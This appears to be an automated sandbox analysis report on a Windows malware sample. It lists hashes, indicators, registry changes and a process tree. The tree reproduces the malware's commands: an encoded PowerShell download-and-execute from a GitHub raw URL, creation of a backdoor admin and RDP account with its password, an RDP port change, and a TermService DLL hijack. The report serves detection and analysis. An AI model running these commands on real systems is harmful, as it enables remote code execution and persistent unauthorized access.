Analysis
-
max time kernel
37s -
max time network
112s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
06-11-2020 11:45
Static task
static1
Behavioral task
behavioral1
Sample
5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a.exe
Resource
win10v20201028
General
-
Target
5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a.exe
-
Size
3.4MB
-
MD5
cb15ff552cc7a8f69df60d2d68c8c54d
-
SHA1
e9780d261ca4b8fbe3a2ca0cfaa587c6c642a8c8
-
SHA256
5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a
-
SHA512
d9689e28c8558390f76119fb6a1449b48e0bcae5fae49a495c8cd3f9accc0eedd9d8a9d853977faee45ac82fcfbaa76e183876ca11841fa659bbe4dd625bacba
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 20 2604 powershell.exe 22 2604 powershell.exe 23 2604 powershell.exe 24 2604 powershell.exe 26 2604 powershell.exe 28 2604 powershell.exe 30 2604 powershell.exe 32 2604 powershell.exe 34 2604 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 3092 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 1636 1636 -
Modifies service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_4vlmj0u5.1nr.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC05B.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_tjm0j40u.tgx.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC03A.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC03B.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC06B.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC019.tmp powershell.exe -
Modifies data under HKEY_USERS 217 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 24 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 26 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 22 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exepid process 3092 powershell.exe 3092 powershell.exe 3092 powershell.exe 3092 powershell.exe 3092 powershell.exe 3092 powershell.exe 2604 powershell.exe 2604 powershell.exe 2604 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 616 616 -
Suspicious use of AdjustPrivilegeToken 77 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3092 powershell.exe Token: SeIncreaseQuotaPrivilege 3092 powershell.exe Token: SeSecurityPrivilege 3092 powershell.exe Token: SeTakeOwnershipPrivilege 3092 powershell.exe Token: SeLoadDriverPrivilege 3092 powershell.exe Token: SeSystemProfilePrivilege 3092 powershell.exe Token: SeSystemtimePrivilege 3092 powershell.exe Token: SeProfSingleProcessPrivilege 3092 powershell.exe Token: SeIncBasePriorityPrivilege 3092 powershell.exe Token: SeCreatePagefilePrivilege 3092 powershell.exe Token: SeBackupPrivilege 3092 powershell.exe Token: SeRestorePrivilege 3092 powershell.exe Token: SeShutdownPrivilege 3092 powershell.exe Token: SeDebugPrivilege 3092 powershell.exe Token: SeSystemEnvironmentPrivilege 3092 powershell.exe Token: SeRemoteShutdownPrivilege 3092 powershell.exe Token: SeUndockPrivilege 3092 powershell.exe Token: SeManageVolumePrivilege 3092 powershell.exe Token: 33 3092 powershell.exe Token: 34 3092 powershell.exe Token: 35 3092 powershell.exe Token: 36 3092 powershell.exe Token: SeIncreaseQuotaPrivilege 3092 powershell.exe Token: SeSecurityPrivilege 3092 powershell.exe Token: SeTakeOwnershipPrivilege 3092 powershell.exe Token: SeLoadDriverPrivilege 3092 powershell.exe Token: SeSystemProfilePrivilege 3092 powershell.exe Token: SeSystemtimePrivilege 3092 powershell.exe Token: SeProfSingleProcessPrivilege 3092 powershell.exe Token: SeIncBasePriorityPrivilege 3092 powershell.exe Token: SeCreatePagefilePrivilege 3092 powershell.exe Token: SeBackupPrivilege 3092 powershell.exe Token: SeRestorePrivilege 3092 powershell.exe Token: SeShutdownPrivilege 3092 powershell.exe Token: SeDebugPrivilege 3092 powershell.exe Token: SeSystemEnvironmentPrivilege 3092 powershell.exe Token: SeRemoteShutdownPrivilege 3092 powershell.exe Token: SeUndockPrivilege 3092 powershell.exe Token: SeManageVolumePrivilege 3092 powershell.exe Token: 33 3092 powershell.exe Token: 34 3092 powershell.exe Token: 35 3092 powershell.exe Token: 36 3092 powershell.exe Token: SeIncreaseQuotaPrivilege 3092 powershell.exe Token: SeSecurityPrivilege 3092 powershell.exe Token: SeTakeOwnershipPrivilege 3092 powershell.exe Token: SeLoadDriverPrivilege 3092 powershell.exe Token: SeSystemProfilePrivilege 3092 powershell.exe Token: SeSystemtimePrivilege 3092 powershell.exe Token: SeProfSingleProcessPrivilege 3092 powershell.exe Token: SeIncBasePriorityPrivilege 3092 powershell.exe Token: SeCreatePagefilePrivilege 3092 powershell.exe Token: SeBackupPrivilege 3092 powershell.exe Token: SeRestorePrivilege 3092 powershell.exe Token: SeShutdownPrivilege 3092 powershell.exe Token: SeDebugPrivilege 3092 powershell.exe Token: SeSystemEnvironmentPrivilege 3092 powershell.exe Token: SeRemoteShutdownPrivilege 3092 powershell.exe Token: SeUndockPrivilege 3092 powershell.exe Token: SeManageVolumePrivilege 3092 powershell.exe Token: 33 3092 powershell.exe Token: 34 3092 powershell.exe Token: 35 3092 powershell.exe Token: 36 3092 powershell.exe -
Suspicious use of WriteProcessMemory 68 IoCs
Processes:
5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4636 wrote to memory of 3092 4636 5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a.exe powershell.exe PID 4636 wrote to memory of 3092 4636 5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a.exe powershell.exe PID 3092 wrote to memory of 1764 3092 powershell.exe csc.exe PID 3092 wrote to memory of 1764 3092 powershell.exe csc.exe PID 1764 wrote to memory of 4288 1764 csc.exe cvtres.exe PID 1764 wrote to memory of 4288 1764 csc.exe cvtres.exe PID 3092 wrote to memory of 4416 3092 powershell.exe reg.exe PID 3092 wrote to memory of 4416 3092 powershell.exe reg.exe PID 3092 wrote to memory of 4400 3092 powershell.exe reg.exe PID 3092 wrote to memory of 4400 3092 powershell.exe reg.exe PID 3092 wrote to memory of 500 3092 powershell.exe reg.exe PID 3092 wrote to memory of 500 3092 powershell.exe reg.exe PID 3092 wrote to memory of 648 3092 powershell.exe net.exe PID 3092 wrote to memory of 648 3092 powershell.exe net.exe PID 648 wrote to memory of 904 648 net.exe net1.exe PID 648 wrote to memory of 904 648 net.exe net1.exe PID 3092 wrote to memory of 364 3092 powershell.exe cmd.exe PID 3092 wrote to memory of 364 3092 powershell.exe cmd.exe PID 364 wrote to memory of 812 364 cmd.exe cmd.exe PID 364 wrote to memory of 812 364 cmd.exe cmd.exe PID 812 wrote to memory of 1056 812 cmd.exe net.exe PID 812 wrote to memory of 1056 812 cmd.exe net.exe PID 1056 wrote to memory of 1216 1056 net.exe net1.exe PID 1056 wrote to memory of 1216 1056 net.exe net1.exe PID 3092 wrote to memory of 1404 3092 powershell.exe cmd.exe PID 3092 wrote to memory of 1404 3092 powershell.exe cmd.exe PID 1404 wrote to memory of 1412 1404 cmd.exe cmd.exe PID 1404 wrote to memory of 1412 1404 cmd.exe cmd.exe PID 1412 wrote to memory of 1492 1412 cmd.exe net.exe PID 1412 wrote to memory of 1492 1412 cmd.exe net.exe PID 1492 wrote to memory of 1584 1492 net.exe net1.exe PID 1492 wrote to memory of 1584 1492 net.exe net1.exe PID 1960 wrote to memory of 2240 1960 cmd.exe net.exe PID 1960 wrote to memory of 2240 1960 cmd.exe net.exe PID 2240 wrote to memory of 2376 2240 net.exe net1.exe PID 2240 wrote to memory of 2376 2240 net.exe net1.exe PID 2484 wrote to memory of 2536 2484 cmd.exe net.exe PID 2484 wrote to memory of 2536 2484 cmd.exe net.exe PID 2536 wrote to memory of 2608 2536 net.exe net1.exe PID 2536 wrote to memory of 2608 2536 net.exe net1.exe PID 3116 wrote to memory of 4600 3116 cmd.exe net.exe PID 3116 wrote to memory of 4600 3116 cmd.exe net.exe PID 4600 wrote to memory of 2628 4600 net.exe net1.exe PID 4600 wrote to memory of 2628 4600 net.exe net1.exe PID 4620 wrote to memory of 184 4620 cmd.exe net.exe PID 4620 wrote to memory of 184 4620 cmd.exe net.exe PID 184 wrote to memory of 4532 184 net.exe net1.exe PID 184 wrote to memory of 4532 184 net.exe net1.exe PID 2872 wrote to memory of 1332 2872 cmd.exe net.exe PID 2872 wrote to memory of 1332 2872 cmd.exe net.exe PID 1332 wrote to memory of 4632 1332 net.exe net1.exe PID 1332 wrote to memory of 4632 1332 net.exe net1.exe PID 4468 wrote to memory of 2572 4468 cmd.exe net.exe PID 4468 wrote to memory of 2572 4468 cmd.exe net.exe PID 2572 wrote to memory of 1316 2572 net.exe net1.exe PID 2572 wrote to memory of 1316 2572 net.exe net1.exe PID 2560 wrote to memory of 4496 2560 cmd.exe WMIC.exe PID 2560 wrote to memory of 4496 2560 cmd.exe WMIC.exe PID 4932 wrote to memory of 4056 4932 cmd.exe WMIC.exe PID 4932 wrote to memory of 4056 4932 cmd.exe WMIC.exe PID 1532 wrote to memory of 688 1532 cmd.exe cmd.exe PID 1532 wrote to memory of 688 1532 cmd.exe cmd.exe PID 688 wrote to memory of 2604 688 cmd.exe powershell.exe PID 688 wrote to memory of 2604 688 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a.exe"C:\Users\Admin\AppData\Local\Temp\5d60845c75247f0a0350edb76e70431dc3cee90841231b079524dc5a2886bc4a.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z2mm4oij\z2mm4oij.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5190.tmp" "c:\Users\Admin\AppData\Local\Temp\z2mm4oij\CSC275C1D5BBB7C49098089648E4E3A7A1A.TMP"4⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin Ghasar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user updwin Ghasar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin Ghasar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin L6kbkYfK /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user updwin L6kbkYfK /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin L6kbkYfK /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" updwin /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" updwin /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" updwin /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin L6kbkYfK1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user updwin L6kbkYfK2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin L6kbkYfK3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
- Suspicious use of WriteProcessMemory
-
